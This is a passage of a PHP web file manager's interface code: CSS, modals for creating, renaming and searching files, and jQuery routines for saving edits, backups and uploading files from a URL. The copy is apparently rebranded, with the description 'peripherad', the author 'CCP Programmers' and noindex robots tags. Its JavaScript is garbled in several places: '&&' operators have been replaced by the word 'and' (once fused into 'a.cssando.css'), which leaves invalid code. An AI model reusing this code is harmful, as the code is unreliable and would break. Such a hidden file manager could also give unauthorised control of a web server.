0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm80-176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm112 176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 180a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 84a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6z'%3E%3C/path%3E%3C/svg%3E");}
        .fm-login-page .brand{ width:121px;overflow:hidden;margin:0 auto;position:relative;z-index:1}
        .fm-login-page .brand img{ width:100%}
        .fm-login-page .card-wrapper{ width:360px;margin-top:10%;margin-left:auto;margin-right:auto;}
        .fm-login-page .card{ border-color:transparent;box-shadow:0 4px 8px rgba(0,0,0,.05)}
        .fm-login-page .card-title{ margin-bottom:1.5rem;font-size:24px;font-weight:400;}
        .fm-login-page .form-control{ border-width:2.3px}
        .fm-login-page .form-group label{ width:100%}
        .fm-login-page .btn.btn-block{ padding:12px 10px}
        .fm-login-page .footer{ margin:40px 0;color:#888;text-align:center}
        @media screen and (max-width:425px){
            .fm-login-page .card-wrapper{ width:90%;margin:0 auto;margin-top:10%;}
        }
        @media screen and (max-width:320px){
            .fm-login-page .card.fat{ padding:0}
            .fm-login-page .card.fat .card-body{ padding:15px}
        }
        .message{ padding:4px 7px;border:1px solid #ddd;background-color:#fff}
        .message.ok{ border-color:green;color:green}
        .message.error{ border-color:red;color:red}
        .message.alert{ border-color:orange;color:orange}
        body.fm-login-page.theme-dark {background-color: #2f2a2a;}
        .theme-dark svg g, .theme-dark svg path {fill: #ffffff; }
    </style>
</head>
<body class="fm-login-page <?php echo (FM_THEME == "dark") ? 'theme-dark' : ''; ?>">
<div id="wrapper" class="container-fluid">

    <?php
    }

    function fm_show_footer_login()
    {
    ?>
</div>
<?php print_external('js-jquery'); ?>
<?php print_external('js-bootstrap'); ?>
</body>
</html>
<?php
}


function fm_show_header()
{
$sprites_ver = '20160315';
header("Content-Type: text/html; charset=utf-8");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");

global $lang, $root_url, $sticky_navbar, $favicon_path;
$isStickyNavBar = $sticky_navbar ? 'navbar-fixed' : 'navbar-normal';
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="peripherad">
    <meta name="author" content="CCP Programmers">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex">
    <?php if($favicon_path) { echo '<link rel="icon" href="'.fanco($favicon_path).'" type="image/png">'; } ?>
    <title><?php echo fanco(APP_TITLE) ?></title>
    <?php print_external('pre-jsdelivr'); ?>
    <?php print_external('pre-cloudflare'); ?>
    <?php print_external('css-bootstrap'); ?>
    <?php print_external('css-font-awesome'); ?>
    <?php if (FM_USE_HIGHLIGHTJS and isset($_GET['view'])): ?>
    <?php print_external('css-highlightjs'); ?>
    <?php endif; ?>
    <script type="text/javascript">window.csrf = '<?php echo $_SESSION['token']; ?>';</script>
    <style>
        html { -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; text-rendering: optimizeLegibility; height: 100%; scroll-behavior: smooth;}
        *,*::before,*::after { box-sizing: border-box;}
        body { font-size:15px; color:#222;background:#F7F7F7; }
        body.navbar-fixed { margin-top:55px; }
        a, a:hover, a:visited, a:focus { text-decoration:none !important; }
        .filename, td, th { white-space:nowrap  }
        .navbar-brand { font-weight:bold; }
        .nav-item.avatar a { cursor:pointer;text-transform:capitalize; }
        .nav-item.avatar a > i { font-size:15px; }
        .nav-item.avatar .dropdown-menu a { font-size:13px; }
        #search-addon { font-size:12px;border-right-width:0; }
        .brl-0 { background:transparent;border-left:0; border-top-left-radius: 0; border-bottom-left-radius: 0; }
        .brr-0 { border-top-right-radius: 0; border-bottom-right-radius: 0; }
        .bread-crumb { color:#cccccc;font-style:normal; }
        #main-table { transition: transform .25s cubic-bezier(0.4, 0.5, 0, 1),width 0s .25s;}
        #main-table .filename a { color:#222222; }
        .table td, .table th { vertical-align:middle !important; }
        .table .custom-checkbox-td .custom-control.custom-checkbox, .table .custom-checkbox-header .custom-control.custom-checkbox { min-width:18px; display: flex;align-items: center; justify-content: center; }
        .table-sm td, .table-sm th { padding:.4rem; }
        .table-bordered td, .table-bordered th { border:1px solid #f1f1f1; }
        .hidden { display:none  }
        pre.with-hljs { padding:0; overflow: hidden;  }
        pre.with-hljs code { margin:0;border:0;overflow:scroll;  }
        code.maxheight, pre.maxheight { max-height:512px  }
        .fa.fa-caret-right { font-size:1.2em;margin:0 4px;vertical-align:middle;color:#ececec  }
        .fa.fa-home { font-size:1.3em;vertical-align:bottom  }
        .path { margin-bottom:10px  }
        form.dropzone { min-height:200px;border:2px dashed #007bff;line-height:6rem; }
        .right { text-align:right  }
        .center, .close, .login-form, .preview-img-container { text-align:center  }
        .message { padding:4px 7px;border:1px solid #ddd;background-color:#fff  }
        .message.ok { border-color:green;color:green  }
        .message.error { border-color:red;color:red  }
        .message.alert { border-color:orange;color:orange  }
        .preview-img { max-width:100%;max-height:80vh;background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAKklEQVR42mL5//8/Azbw+PFjrOJMDCSCUQ3EABZc4S0rKzsaSvTTABBgAMyfCMsY4B9iAAAAAElFTkSuQmCC);cursor:zoom-in }
        input#preview-img-zoomCheck[type=checkbox] { display:none }
        input#preview-img-zoomCheck[type=checkbox]:checked ~ label > img { max-width:none;max-height:none;cursor:zoom-out }
        .inline-actions > a > i { font-size:1em;margin-left:5px;background:#3785c1;color:#fff;padding:3px 4px;border-radius:3px; }
        .preview-video { position:relative;max-width:100%;height:0;padding-bottom:62.5%;margin-bottom:10px  }
        .preview-video video { position:absolute;width:100%;height:100%;left:0;top:0;background:#000  }
        .compact-table { border:0;width:auto  }
        .compact-table td, .compact-table th { width:100px;border:0;text-align:center  }
        .compact-table tr:hover td { background-color:#fff  }
        .filename { max-width:420px;overflow:hidden;text-overflow:ellipsis  }
        .break-word { word-wrap:break-word;margin-left:30px  }
        .break-word.float-left a { color:#7d7d7d  }
        .break-word + .float-right { padding-right:30px;position:relative  }
        .break-word + .float-right > a { color:#7d7d7d;font-size:1.2em;margin-right:4px  }
        #editor { position:absolute;right:15px;top:100px;bottom:15px;left:15px  }
        @media (max-width:481px) {
            #editor { top:150px; }
        }
        #normal-editor { border-radius:3px;border-width:2px;padding:10px;outline:none; }
        .btn-2 { padding:4px 10px;font-size:small; }
        li.file:before,li.folder:before { font:normal normal normal 14px/1 FontAwesome;content:"\f016";margin-right:5px }
        li.folder:before { content:"\f114" }
        i.fa.fa-folder-o { color:#0157b3 }
        i.fa.fa-picture-o { color:#26b99a }
        i.fa.fa-file-archive-o { color:#da7d7d }
        .btn-2 i.fa.fa-file-archive-o { color:inherit }
        i.fa.fa-css3 { color:#f36fa0 }
        i.fa.fa-file-code-o { color:#007bff }
        i.fa.fa-code { color:#cc4b4c }
        i.fa.fa-file-text-o { color:#0096e6 }
        i.fa.fa-html5 { color:#d75e72 }
        i.fa.fa-file-excel-o { color:#09c55d }
        i.fa.fa-file-powerpoint-o { color:#f6712e }
        i.go-back { font-size:1.2em;color:#007bff; }
        .main-nav { padding:0.2rem 1rem;box-shadow:0 4px 5px 0 rgba(0, 0, 0, .14), 0 1px 10px 0 rgba(0, 0, 0, .12), 0 2px 4px -1px rgba(0, 0, 0, .2)  }
        .dataTables_filter { display:none; }
        table.dataTable thead .sorting { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAQAAADYWf5HAAAAkElEQVQoz7XQMQ5AQBCF4dWQSJxC5wwax1Cq1e7BAdxD5SL+Tq/QCM1oNiJidwox0355mXnG/DrEtIQ6azioNZQxI0ykPhTQIwhCR+BmBYtlK7kLJYwWCcJA9M4qdrZrd8pPjZWPtOqdRQy320YSV17OatFC4euts6z39GYMKRPCTKY9UnPQ6P+GtMRfGtPnBCiqhAeJPmkqAAAAAElFTkSuQmCC'); }
        table.dataTable thead .sorting_asc { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZ0lEQVQ4y2NgGLKgquEuFxBPAGI2ahhWCsS/gDibUoO0gPgxEP8H4ttArEyuQYxAPBdqEAxPBImTY5gjEL9DM+wTENuQahAvEO9DMwiGdwAxOymGJQLxTyD+jgWDxCMZRsEoGAVoAADeemwtPcZI2wAAAABJRU5ErkJggg=='); }
        table.dataTable thead .sorting_desc { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZUlEQVQ4y2NgGAWjYBSggaqGu5FA/BOIv2PBIPFEUgxjB+IdQPwfC94HxLykus4GiD+hGfQOiB3J8SojEE9EM2wuSJzcsFMG4ttQgx4DsRalkZENxL+AuJQaMcsGxBOAmGvopk8AVz1sLZgg0bsAAAAASUVORK5CYII='); }
        table.dataTable thead tr:first-child th.custom-checkbox-header:first-child { background-image:none; }
        .footer-action li { margin-bottom:10px; }
        .app-v-title { font-size:24px;font-weight:300;letter-spacing:-.5px;text-transform:uppercase; }
        hr.custom-hr { border-top:1px dashed #8c8b8b;border-bottom:1px dashed #fff; }
        #snackbar { visibility:hidden;min-width:250px;margin-left:-125px;background-color:#333;color:#fff;text-align:center;border-radius:2px;padding:16px;position:fixed;z-index:1;left:50%;bottom:30px;font-size:17px; }
        #snackbar.show { visibility:visible;-webkit-animation:fadein 0.5s, fadeout 0.5s 2.5s;animation:fadein 0.5s, fadeout 0.5s 2.5s; }
        @-webkit-keyframes fadein { from { bottom:0;opacity:0; }
        to { bottom:30px;opacity:1; }
        }
        @keyframes fadein { from { bottom:0;opacity:0; }
        to { bottom:30px;opacity:1; }
        }
        @-webkit-keyframes fadeout { from { bottom:30px;opacity:1; }
        to { bottom:0;opacity:0; }
        }
        @keyframes fadeout { from { bottom:30px;opacity:1; }
        to { bottom:0;opacity:0; }
        }
        #main-table span.badge { border-bottom:2px solid #f8f9fa }
        #main-table span.badge:nth-child(1) { border-color:#df4227 }
        #main-table span.badge:nth-child(2) { border-color:#f8b600 }
        #main-table span.badge:nth-child(3) { border-color:#00bd60 }
        #main-table span.badge:nth-child(4) { border-color:#4581ff }
        #main-table span.badge:nth-child(5) { border-color:#ac68fc }
        #main-table span.badge:nth-child(6) { border-color:#45c3d2 }
        @media only screen and (min-device-width:768px) and (max-device-width:1024px) and (orientation:landscape) and (-webkit-min-device-pixel-ratio:2) { .navbar-collapse .col-xs-6 { padding:0; }
        }
        .btn.active.focus,.btn.active:focus,.btn.focus,.btn.focus:active,.btn:active:focus,.btn:focus { outline:0!important;outline-offset:0!important;background-image:none!important;-webkit-box-shadow:none!important;box-shadow:none!important }
        .lds-facebook { display:none;position:relative;width:64px;height:64px }
        .lds-facebook div,.lds-facebook.show-me { display:inline-block }
        .lds-facebook div { position:absolute;left:6px;width:13px;background:#007bff;animation:lds-facebook 1.2s cubic-bezier(0,.5,.5,1) infinite }
        .lds-facebook div:nth-child(1) { left:6px;animation-delay:-.24s }
        .lds-facebook div:nth-child(2) { left:26px;animation-delay:-.12s }
        .lds-facebook div:nth-child(3) { left:45px;animation-delay:0s }
        @keyframes lds-facebook { 0% { top:6px;height:51px }
        100%,50% { top:19px;height:26px }
        }
        ul#search-wrapper { padding-left: 0;border: 1px solid #ecececcc; } ul#search-wrapper li { list-style: none; padding: 5px;border-bottom: 1px solid #ecececcc; }
        ul#search-wrapper li:nth-child(odd){ background: #f9f9f9cc;}
        .c-preview-img { max-width: 300px; }
        .border-radius-0 { border-radius: 0; }
        .float-right { float: right; }
        .table-hover>tbody>tr:hover>td:first-child { border-left: 1px solid #1b77fd; }
        #main-table tr.even { background-color: #F8F9Fa; }
        .filename>a>i {margin-right: 3px;}
    </style>
    <?php
    if (FM_THEME == "dark"): ?>
        <style>
            :root {
                --bs-bg-opacity: 1;
                --bg-color: #f3daa6;
                --bs-dark-rgb: 28, 36, 41 !important;
                --bs-bg-opacity: 1;
            }
            .table-dark { --bs-table-bg: 28, 36, 41 !important; }
            .btn-primary { --bs-btn-bg: #26566c; --bs-btn-border-color: #26566c; }
            body.theme-dark { background-image: linear-gradient(90deg, #1c2429, #263238); color: #CFD8DC; }
            .list-group .list-group-item { background: #343a40; }
            .theme-dark .navbar-nav i, .navbar-nav .dropdown-toggle, .break-word { color: #CFD8DC; }
            a, a:hover, a:visited, a:active, #main-table .filename a, i.fa.fa-folder-o, i.go-back { color: var(--bg-color); }
            ul#search-wrapper li:nth-child(odd) { background: #212a2f; }
            .theme-dark .btn-outline-primary { color: #b8e59c; border-color: #b8e59c; }
            .theme-dark .btn-outline-primary:hover, .theme-dark .btn-outline-primary:active { background-color: #2d4121;}
            .theme-dark input.form-control { background-color: #101518; color: #CFD8DC; }
            .theme-dark .dropzone { background: transparent; }
            .theme-dark .inline-actions > a > i { background: #79755e; }
            .theme-dark .text-white { color: #CFD8DC !important; }
            .theme-dark .table-bordered td, .table-bordered th { border-color: #343434; }
            .theme-dark .table-bordered td .custom-control-input, .theme-dark .table-bordered th .custom-control-input { opacity: 0.678; }
            .message { background-color: #212529; }
            .compact-table tr:hover td { background-color: #3d3d3d; }
            #main-table tr.even { background-color: #21292f; }
            form.dropzone { border-color: #79755e; }
        </style>
    <?php endif; ?>
</head>
<body class="<?php echo (FM_THEME == "dark") ? 'theme-dark' : ''; ?> <?php echo $isStickyNavBar; ?>">
<div id="wrapper" class="container-fluid">
    <!-- New Item creation -->
    <div class="modal fade" id="createNewItem" tabindex="-1" role="dialog" data-bs-backdrop="static" data-bs-keyboard="false" aria-labelledby="newItemModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <form class="modal-content <?php echo fm_get_theme(); ?>" method="post">
                <div class="modal-header">
                    <h5 class="modal-title" id="newItemModalLabel"><i class="fa fa-plus-square fa-fw"></i><?php echo lng('CreateNewItem') ?></h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body">
                    <p><label for="newfile"><?php echo lng('ItemType') ?> </label></p>
                    <div class="form-check form-check-inline">
                      <input class="form-check-input" type="radio" name="newfile" id="customRadioInline1" name="newfile" value="file">
                      <label class="form-check-label" for="customRadioInline1"><?php echo lng('File') ?></label>
                    </div>
                    <div class="form-check form-check-inline">
                      <input class="form-check-input" type="radio" name="newfile" id="customRadioInline2" value="folder" checked>
                      <label class="form-check-label" for="customRadioInline2"><?php echo lng('Folder') ?></label>
                    </div>

                    <p class="mt-3"><label for="newfilename"><?php echo lng('ItemName') ?> </label></p>
                    <input type="text" name="newfilename" id="newfilename" value="" class="form-control" placeholder="<?php echo lng('Enter here...') ?>" required>
                </div>
                <div class="modal-footer">
                    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                    <button type="button" class="btn btn-outline-primary" data-bs-dismiss="modal"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></button>
                    <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('CreateNow') ?></button>
                </div>
            </form>
        </div>
    </div>

    <!-- Advance Search Modal -->
    <div class="modal fade" id="searchModal" tabindex="-1" role="dialog" aria-labelledby="searchModalLabel" aria-hidden="true">
      <div class="modal-dialog modal-lg" role="document">
        <div class="modal-content <?php echo fm_get_theme(); ?>">
          <div class="modal-header">
            <h5 class="modal-title col-10" id="searchModalLabel">
                <div class="input-group mb-3">
                  <input type="text" class="form-control" placeholder="<?php echo lng('Search') ?> <?php echo lng('a files') ?>" aria-label="<?php echo lng('Search') ?>" aria-describedby="search-addon3" id="advanced-search" autofocus required>
                  <span class="input-group-text" id="search-addon3"><i class="fa fa-search"></i></span>
                </div>
            </h5>
            <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
          </div>
          <div class="modal-body">
            <form action="" method="post">
                <div class="lds-facebook"><div></div><div></div><div></div></div>
                <ul id="search-wrapper">
                    <p class="m-2"><?php echo lng('Search file in folder and subfolders...') ?></p>
                </ul>
            </form>
          </div>
        </div>
      </div>
    </div>

    <!--Rename Modal -->
    <div class="modal modal-alert" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" role="dialog" id="renameDailog">
      <div class="modal-dialog" role="document">
        <form class="modal-content rounded-3 shadow <?php echo fm_get_theme(); ?>" method="post" autocomplete="off">
          <div class="modal-body p-4 text-center">
            <h5 class="mb-3"><?php echo lng('Are you sure want to rename?') ?></h5>
            <p class="mb-1">
                <input type="text" name="rename_to" id="js-rename-to" class="form-control" placeholder="<?php echo lng('Enter new file name') ?>" required>
                <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                <input type="hidden" name="rename_from" id="js-rename-from">
            </p>
          </div>
          <div class="modal-footer flex-nowrap p-0">
            <button type="button" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0 border-end" data-bs-dismiss="modal"><?php echo lng('Cancel') ?></button>
            <button type="submit" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0"><strong><?php echo lng('Okay') ?></strong></button>
          </div>
        </form>
      </div>
    </div>

    <!-- Confirm Modal -->
    <script type="text/html" id="js-tpl-confirm">
        <div class="modal modal-alert confirmDailog" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" role="dialog" id="confirmDailog-<%this.id%>">
          <div class="modal-dialog" role="document">
            <form class="modal-content rounded-3 shadow <?php echo fm_get_theme(); ?>" method="post" autocomplete="off" action="<%this.action%>">
              <div class="modal-body p-4 text-center">
                <h5 class="mb-2"><?php echo lng('Are you sure want to') ?> <%this.title%> ?</h5>
                <p class="mb-1"><%this.content%></p>
              </div>
              <div class="modal-footer flex-nowrap p-0">
                <button type="button" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0 border-end" data-bs-dismiss="modal"><?php echo lng('Cancel') ?></button>
                <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                <button type="submit" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0" data-bs-dismiss="modal"><strong><?php echo lng('Okay') ?></strong></button>
              </div>
            </form>
          </div>
        </div>
    </script>

    <?php
    }


    function fm_show_footer()
    {
    ?>
</div>
<?php print_external('js-jquery'); ?>
<?php print_external('js-bootstrap'); ?>
<?php print_external('js-jquery-datatables'); ?>
<?php if (FM_USE_HIGHLIGHTJS and isset($_GET['view'])): ?>
    <?php print_external('js-highlightjs'); ?>
    <script>hljs.highlightAll(); var isHighlightingEnabled = true;</script>
<?php endif; ?>
<script>
    function template(html,options){
        var re=/<\%([^\%>]+)?\%>/g,reExp=/(^( )?(if|for|else|switch|case|break|{|}))(.*)?/g,code='var r=[];\n',cursor=0,match;var add=function(line,js){js?(code+=line.match(reExp)?line+'\n':'r.push('+line+');\n'):(code+=line!=''?'r.push("'+line.replace(/"/g,'\\"')+'");\n':'');return add}
        while(match=re.exec(html)){add(html.slice(cursor,match.index))(match[1],!0);cursor=match.index+match[0].length}
        add(html.substr(cursor,html.length-cursor));code+='return r.join("");';return new Function(code.replace(/[\r\t\n]/g,'')).apply(options)
    }
    function rename(e, t) { if(t) { $("#js-rename-from").val(t);$("#js-rename-to").val(t); $("#renameDailog").modal('show'); } }
    function change_checkboxes(e, t) { for (var n = e.length - 1; n >= 0; n--) e[n].checked = "boolean" == typeof t ? t : !e[n].checked }
    function get_checkboxes() { for (var e = document.getElementsByName("file[]"), t = [], n = e.length - 1; n >= 0; n--) (e[n].type = "checkbox") and t.push(e[n]); return t }
    function select_all() { change_checkboxes(get_checkboxes(), !0) }
    function unselect_all() { change_checkboxes(get_checkboxes(), !1) }
    function invert_all() { change_checkboxes(get_checkboxes()) }
    function checkbox_toggle() { var e = get_checkboxes(); e.push(this), change_checkboxes(e) }
    function backup(e, t) {
        var n = new XMLHttpRequest,
            a = "path=" + e + "&file=" + t + "&token="+ window.csrf +"&type=backup&ajax=true";
        return n.open("POST", "", !0), n.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), n.onreadystatechange = function () {
            4 == n.readyState and 200 == n.status and toast(n.responseText)
        }, n.send(a), !1
    }
    // Toast message
    function toast(txt) { var x = document.getElementById("snackbar");x.innerHTML=txt;x.className = "show";setTimeout(function(){ x.className = x.className.replace("show", ""); }, 3000); }
    // Save file
    function edit_save(e, t) {
        var n = "ace" == t ? editor.getSession().getValue() : document.getElementById("normal-editor").value;
        if (typeof n !== 'undefined' and n !== null) {
            if (true) {
                var data = {ajax: true, content: n, type: 'save', token: window.csrf};

                $.ajax({
                    type: "POST",
                    url: window.location,
                    data: JSON.stringify(data),
                    contentType: "application/json; charset=utf-8",
                    success: function(mes){toast("Saved Successfully"); window.onbeforeunload = function() {return}},
                    failure: function(mes) {toast("Error: try again");},
                    error: function(mes) {toast(`<p style="background-color:red">${mes.responseText}</p>`);}
                });
            } else {
                var a = document.createElement("form");
                a.setAttribute("method", "POST"), a.setAttribute("action", "");
                var o = document.createElement("textarea");
                o.setAttribute("type", "textarea"), o.setAttribute("name", "savedata");
                let cx = document.createElement("input"); cx.setAttribute("type", "hidden");cx.setAttribute("name", "token");cx.setAttribute("value", window.csrf);
                var c = document.createTextNode(n);
                o.appendChild(c), a.appendChild(o), a.appendChild(cx), document.body.appendChild(a), a.submit()
            }
        }
    }
    function show_new_pwd() { $(".js-new-pwd").toggleClass('hidden'); }
    // Save Settings
    function save_settings($this) {
        let form = $($this);
        $.ajax({
            type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
            success: function (data) {if(data) { window.location.reload();}}
        }); return false;
    }
    //Create new password hash
    function new_password_hash($this) {
        let form = $($this), $pwd = $("#js-pwd-result"); $pwd.val('');
        $.ajax({
            type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
            success: function (data) { if(data) { $pwd.val(data); } }
        }); return false;
    }
    // Upload files using URL @param {Object}
    function upload_from_url($this) {
        let form = $($this), resultWrapper = $("div#js-url-upload__list");
        $.ajax({
            type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
            beforeSend: function() { form.find("input[name=uploadurl]").attr("disabled","disabled"); form.find("button").hide(); form.find(".lds-facebook").addClass('show-me'); },
            success: function (data) {
                if(data) {
                    data = JSON.parse(data);
                    if(data.done) {
                        resultWrapper.append('<div class="alert alert-success row">Uploaded Successful: '+data.done.name+'</div>'); form.find("input[name=uploadurl]").val('');
                    } else if(data['fail']) { resultWrapper.append('<div class="alert alert-danger row">Error: '+data.fail.message+'</div>'); }
                    form.find("input[name=uploadurl]").removeAttr("disabled");form.find("button").show();form.find(".lds-facebook").removeClass('show-me');
                }
            },
            error: function(xhr) {
                form.find("input[name=uploadurl]").removeAttr("disabled");form.find("button").show();form.find(".lds-facebook").removeClass('show-me');console.error(xhr);
            }
        }); return false;
    }
    // Search template
    function search_template(data) {
        var response = "";
        $.each(data, function (key, val) {
            response += `<li><a href="?p=${val.path}&view=${val.name}">${val.path}/${val.name}</a></li>`;
        });
        return response;
    }
    // Advance search
    function fm_search() {
        var searchTxt = $("input#advanced-search").val(), searchWrapper = $("ul#search-wrapper"), path = $("#js-search-modal").attr("href"), _html = "", $loader = $("div.lds-facebook");
        if(!!searchTxt and searchTxt.length > 2 and path) {
            var data = {ajax: true, content: searchTxt, path:path, type: 'search', token: window.csrf };
            $.ajax({
                type: "POST",
                url: window.location,
                data: data,
                beforeSend: function() {
                    searchWrapper.html('');
                    $loader.addClass('show-me');
                },
                success: function(data){
                    $loader.removeClass('show-me');
                    data = JSON.parse(data);
                    if(data and data.length) {
                        _html = search_template(data);
                        searchWrapper.html(_html);
                    } else { searchWrapper.html('<p class="m-2">No result found!<p>'); }
                },
                error: function(xhr) { $loader.removeClass('show-me'); searchWrapper.html('<p class="m-2">ERROR: Try again later!</p>'); },
                failure: function(mes) { $loader.removeClass('show-me'); searchWrapper.html('<p class="m-2">ERROR: Try again later!</p>');}
            });
        } else { searchWrapper.html("OOPS: minimum 3 characters required!"); }
    }

    // action confirm dailog modal
    function confirmDailog(e, id = 0, title = "Action", content = "", action = null) {
        e.preventDefault();
        const tplObj = {id, title, content: decodeURIComponent(content.replace(/\+/g, ' ')), action};
        let tpl = $("#js-tpl-confirm").html();
        $(".modal.confirmDailog").remove();
        $('#wrapper').append(template(tpl,tplObj));
        const $confirmDailog = $("#confirmDailog-"+tplObj.id);
        $confirmDailog.modal('show');
        return false;
    }
    

    // on mouse hover image preview
    !function(s){s.previewImage=function(e){var o=s(document),t=".previewImage",a=s.extend({xOffset:20,yOffset:-20,fadeIn:"fast",css:{padding:"5px",border:"1px solid #cccccc","background-color":"#fff"},eventSelector:"[data-preview-image]",dataKey:"previewImage",overlayId:"preview-image-plugin-overlay"},e);return o.off(t),o.on("mouseover"+t,a.eventSelector,function(e){s("p#"+a.overlayId).remove();var o=s("<p>").attr("id",a.overlayId).css("position","absolute").css("display","none").append(s('<img class="c-preview-img">').attr("src",s(this).data(a.dataKey)));a.cssando.css(a.css),s("body").append(o),o.css("top",e.pageY+a.yOffset+"px").css("left",e.pageX+a.xOffset+"px").fadeIn(a.fadeIn)}),o.on("mouseout"+t,a.eventSelector,function(){s("#"+a.overlayId).remove()}),o.on("mousemove"+t,a.eventSelector,function(e){s("#"+a.overlayId).css("top",e.pageY+a.yOffset+"px").css("left",e.pageX+a.xOffset+"px")}),this},s.previewImage()}(jQuery);

    // Dom Ready Events
    $(document).ready( function () {
        // dataTable init
        var $table = $('#main-table'),
            tableLng = $table.find('th').length,
            _targets = (tableLng and tableLng == 7 ) ? [0, 4,5,6] : tableLng == 5 ? [0,4] : [3];
            mainTable = $('#main-table').DataTable({paging: false, info: false, order: [], columnDefs: [{targets: _targets, orderable: false}]
        });
        // filter table
        $('#search-addon').on( 'keyup', function () {
            mainTable.search( this.value ).draw();
        });
        $("input#advanced-search").on('keyup', function (e) {
            if (e.keyCode === 13) { fm_search(); }
        });
        $('#search-addon3').on( 'click', function () { fm_search(); });
        //upload nav tabs
        $(".fm-upload-wrapper .card-header-tabs").on("click", 'a', function(e){
            e.preventDefault();let target=$(this).data('target');
            $(".fm-upload-wrapper .card-header-tabs a").removeClass('active');$(this).addClass('active');
            $(".fm-upload-wrapper .card-tabs-container").addClass('hidden');$(target).removeClass('hidden');
        });
    });
</script>
<?php if (isset($_GET['edit']) and isset($_GET['env']) and FM_EDIT_FILE and !FM_READONLY):
        
        $ext = pathinfo($_GET["edit"], PATHINFO_EXTENSION);
        $ext =  $ext == "js" ? "javascript" :  $ext;
        ?>
    <?php print_external('js-ace'); ?>
    <script>
        var editor = ace.edit("editor");
        editor.getSession().setMode( {path:"ace/mode/<?php echo $ext; ?>", inline:true} );
        //editor.setTheme("ace/theme/twilight"); //Dark Theme
        editor.setShowPrintMargin(false); // Hide the vertical ruler
        function ace_commend (cmd) { editor.commands.exec(cmd, editor); }
        editor.commands.addCommands([{
            name: 'save', bindKey: {win: 'Ctrl-S',  mac: 'Command-S'},
            exec: function(editor) { edit_save(this, 'ace'); }
        }]);
        function renderThemeMode() {
            var $modeEl = $("select#js-ace-mode"), $themeEl = $("select#js-ace-theme"), $fontSizeEl = $("select#js-ace-fontSize"), optionNode = function(type, arr){ var $Option = ""; $.each(arr, function(i, val) { $Option += "<option value='"+type+i+"'>" + val + "</option>"; }); return $Option; },
